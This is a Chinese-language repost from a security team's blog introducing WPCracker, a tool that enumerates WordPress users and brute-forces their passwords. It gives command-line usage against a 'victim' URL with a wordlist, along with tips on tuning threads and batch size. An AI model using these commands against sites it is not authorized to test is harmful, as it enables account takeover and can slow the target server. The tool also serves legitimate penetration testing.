神兵利器 - WPCracker WordPress暴力破解工具

Khan安全团队

发布于 2021-02-08 11:33:26

1.7K0

发布于 2021-02-08 11:33:26

适用于Windows和Linux的WordPress用户枚举和登录密码破解工具

你可以控制你想要执行的攻击力度，这将影响所需的攻击时间。该工具可以调整线程的数量，以及每个线程每次测试的密码批量有多大。但是，攻击力过大会导致受害者的服务器速度变慢。

例如，当我攻击到我的本地服务器时，当我使用程序预设的线程数(12)和批次大小(1000)时，大约需要两天的时间去完成rockyou.txt(14,341,564个唯一密码)。

使用方法

用户枚举：

.\WPCracker.exe --enum -u <Url to victims WordPress page> -o <Output file path (OPTIONAL)>

或者

.\WPCracker.exe --enum

使用默认设定：

.\WPCracker.exe --brute -u <Url to victims WordPress page> -p <Path to wordlist> -n <Username> -o <Output file path (OPTIONAL)>

或者

.\WPCracker.exe --brute

使用自定义设置：

.\WPCracker.exe --brute -u <Url to victims WordPress page> -p <Path to wordlist> -n <Username> -t <Max threads> -c <Batch maximum size>

或者

.\WPCracker.exe --brute -?

本文参与腾讯云自媒体分享计划，分享自微信公众号。

原始发表：2021-01-29，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体分享计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度